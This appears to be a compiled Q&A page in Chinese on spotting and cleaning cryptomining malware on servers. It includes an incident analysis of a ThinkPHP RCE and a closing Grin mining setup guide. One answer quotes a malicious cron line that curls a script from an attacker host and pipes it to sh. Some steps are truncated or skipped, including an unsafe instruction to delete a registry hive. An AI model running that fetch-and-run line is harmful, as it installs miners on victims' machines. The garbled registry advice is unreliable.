windows挖矿日志分析

『壹』 中挖矿病毒的表现

故障现象：使用过程中，发现经常有服务无故关闭，登录服务器经检查，发现CPU使用率达到100%。在检测异常进程中，未发现CPU使用率异常的进程（使用 top、htop 以及 ps -aux 进行检查），于是报障。

检测过程：

1.找到他shell脚本对应目录把目录或者文件删除。

2.检查定时任务是否存在挖矿木马文件在定时任务中，避免定时运行挖矿木马文件。

3.添加hosts挖矿病毒访问对应网站，避免二次访问并下载。

4.排查liunx命令是否损坏，如损坏下载"procps-3.2.8"并编译，恢复top等系列命令。

5.检测进程是否异常。

6.排查入侵入口，例如 redis是否存在弱口令，nginx或者apache上面的网站程序是否存在漏洞，并排查下nginx或者apache日志审查漏洞所在处。

7.排查ssh登录日志。

8.把ssh登录切换成秘钥登录。

9.重启服务器，检查是否进程是否正常。

『贰』 windows 10 怎么清除木马挖矿病毒

既然是中毒了，就杀毒呗。
首先进行全盘杀毒操作，确认是否有病毒。可以尝试网络在线杀毒。
如果无法杀毒，建议使用PE系统盘启动电脑，备份重要的数据后，对硬盘进行快速分区，重建主引导记录，彻底清除可能的病毒隐患，然后重新安装系统。
系统安装完成，记得安装杀毒软件，并升级病毒库，再对备份数据杀毒。

『叁』 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

『肆』 挖矿病毒怎么处理

挖矿病毒处理步骤如下：

1、查看服务器进程运行状态查看服务器系统整体运行情况，发现名为kdevtmpfsi的挖矿进程大量占用系统CPU使用率。

2、查看端口及外联情况查看端口开放状态及外联情况，发现主机存在陌生外联行为。对该外部地址进行查询发现属于国外地址，进一步确定该进程为恶意挖矿进程：定位挖矿进程及其守护进程PID挖矿病毒kdevtmpfsi在运行过程中不仅会产生进程kdevtmpfsi。

6、查看redis日志通过查看redis配置文件/etc/redis.conf发现日志功能未开启。

7、查找敏感文件发现authorized_keys文件。

8、查看ssh日志文件查看ssh日志文件，发现大量登陆痕迹以及公钥上传痕迹。

『伍』 怎样知道电脑被挖矿

电脑异常运行缓慢，经常异常死机/卡机，什么都没打开但是cpu占用率非常高，网络缓慢，出现大量网络请求。就需要去检查一下是否中了挖，毕竟现在很流行的。

首先需要先查看计算机的耗电情况，我一般选择安装鲁大师。这个比较方便的掌握电脑的硬件情况，看看cpu和系统的温度很方便的。

然后再检查启动后的系统资源使用情况，有没有异常和较高的内存和cpu的占用情况。Crtl + Alt + Del 即可进入“Windows任务管理器”，“应用程序”---“进程”---“性能”，都是查看系统资源占用状况的。或者：用鼠标点击“开始”，在“运行”里输入：msconfig，也可以进入同样的窗口。

最后在进程里看有没有不熟悉的进程，发现了到网上搜索一下，基本就可以确定有没有了。

检测电脑是否被挖矿方法
挖矿主要利用的是高级显卡，这样效率最高，所以我们只需要监看GPU以及CPU的使用率即可发现。回到主界面，鼠标右键单击开始按钮，如下图所示

2在开始右键菜单点击任务管理器，如下图所示

3进入任务管理器，先看看运行程序有无cpu使用率极高的，如下图所示

4在任务管理器点击性能选项卡，如下图所示

5进入性能选项卡，点击下面的GPU，一般有2个，分别是集成显卡和独立显卡，如下图所示

6正常情况，集成显卡利用率很低，图形游戏或大型绘图软件才会调用独立显卡，如下图所示

7接着我们看独立显卡，默认情况下，独立显卡是不使用的，如果你发现游戏，工程软件没开，独立显卡利用率比较高，那就是被挖矿的，电脑正常，独立显卡是休息状态，

『陆』 挖矿病毒怎么排查

登录系统查看任务管理器，查看占用内存较大且无法关闭的进程。进程上点击鼠标右键，打开文件位置（先要在文件夹选项中选择显示隐藏文件及操作系文件）。此时你可能会看到有一个Systmss.exe进程和模仿操作系统的svchost.exe进程这里还可以看到一个2.bat文件，右键编辑打开这个文件查看，可查看到恶意进程与哪个挖矿组织通信。

通过查看系统操作日志可分析出病毒的来源、启动时间等信息，一般原因可能是未关闭3389端口且使用了弱密码导致黑客远程登录上次病毒。

根除病毒：将病毒可执行文件Systmss.exe重命名为Systmss.exe1使病毒无法执行，此时可从任务管理器停止进程。打开注册表编辑器删除HKEY_LOCAL_整个目录。

如果是Linux系统请参考：网页链接

『柒』 关于一些比特币挖矿的事

说实话 瞎耽误功夫

『捌』 一次挖矿病毒攻击分析

这两天期末了，最近老板这里突然来了个任务，客户服务器被攻击了，某台机器的cpu一直都跑满了，持续高负荷状态，客户公司的运营实在没有办法找到了我们。
先说一说之前这台服务器也出现过问题，被两波人搞过，一波写了webshell，另个一种了挖矿病毒，都被清除了，当然这些我都没有参与。
因为老板比较忙，我和另一个小伙伴接手进行分析，我们拿到这台服务器，既然是web服务器，最好得最有效的办法就是看web日志，但是这个日志是在很多，这就考虑经验问题了，另一个小伙伴道行比我深，他发现了痕迹：

通过很多尝试，在筛选“wget”的时候找到了攻击痕迹。

emmmmm，看到这个POST的请求，基本可以猜测出就是这几天爆出的thinkphp新的rce，具体读者可以去看看相关的报告，rce的分析网上也有了，有想去的可以去了解一下。根据这条日志，筛选ip我们找到了具体的攻击痕迹：

上传ibus脚本文件到tmp目录下命名为指定文件，这里www用户有对tmp目录的读写权限。

执行tmp中上传的指定文件，并等待执行完成，删除文件.
本地虚拟环境执行了一下这个ibus脚本：

可以看到这里执行生成了三个sh简单加密的脚本文件：nmi，nbus和.dbus是哪个文件，这三个脚本文件解密之后是三个cat和perl的脚本，分别执行了一下命令：

执行了三个perl脚本，就是挖矿的脚本了。最后我们把生成的恶意文件备份之后就进行清除了，总共是三个sh脚本，三个perl挖矿脚本和两个记录id的随机数之类的文件。
怎么说呢，这次攻击分析看似挺简单的，但是最难的部分，从日志里找出攻击者的恶意访问是很困难的，需要有很多的经验，比如对最近新漏洞的了解，以及各类典型漏洞的攻击方式，才能及时的从庞大的日志文件中根据特征找到攻击者的痕迹。
安全从业者还是十分吃经验的，博主也会更多的在实战中历练自己，也会分享记录自己的经验。

『玖』 阿里云windows服务器中了挖矿的病毒怎么清理

光删除没用的，因为没有解决好漏洞。
建议是重做系统，然后找护卫神给你做一下系统安全加固，把漏洞彻底堵住才有效果。

『拾』 极简Grin挖矿指南（Win10）

Grin不多重复介绍了，近期很火的一个匿名币（ https://grin-tech.org/ ），而且还能用CPU、GPU挖矿（N卡。目前似乎还不支持A卡），并且支持多个平台Linux、macOS等等。官网上说不支持Windows，但实际是可以跑的。下面是Windows 10上的部署过程小结。

Windows上用WSL来部署Linux的环境最为方便。在Microsoft Store中搜索Ubuntu即可安装。

注意！ 装完之后要修改一下注册表。不然因为这个内嵌的Ubuntu会带很多奇怪的Path，导致后面build会出问题，产生不了运行所需的plugin文件夹。

具体步骤是：运行regedit。在注册表项中，找到 ComputerHKEY_CURRENT_ 将Flag的值改为 5 。

运行Ubuntu，新建用户名、并输入自己想要设置的密码

Grin是用rust编写的，安装好相关环境

再安装好其他依赖

Grin节点也和其他区块链类似，可以自己部署也可以利用矿池。两种方式选一即可。

如果要自己运行一个Grin节点，按照以下步骤：

target/release/grin 即为可运行文件

目前也有一些Grin的矿池可以链接，不想自己运行Grin的话，可以注册一个。比较有名的是GRIN-Pool（ https://mwgrinpool.com/ ）
点右上角Login后按提示注册即可。自己需要记住用户名和密码。

另开一个Ubuntu的终端，输入：

检查你CPU是否支持avx2

如果大于0，那么输入以下：

如果是多核，可以指定挖矿的核数（build后每次运行前也可以修改）

查看有多少个可用的CPU，并输入想使用的CPU数量

如果是N卡，可以用GPU挖矿

然后输入 nvidia-smi 运行后得到的Device ID

如果用的是矿池，还要额外配置一下矿池信息：

输入在矿池里注册的用户名和密码

先build

然后运行

如果一切顺利，现在已经可以挖矿了；如果不顺利，那么我也不知道了。

https://github.com/mimblewimble/grin
https://github.com/mimblewimble/grin-miner
https://medium.com/@blade.doyle/cpu-mining-on-mwgrinpool-com-how-to-efb9ed102bc9
https://medium.com/@blade.doyle/gpu-mining-on-mwgrinpool-com-how-to-72970e550a27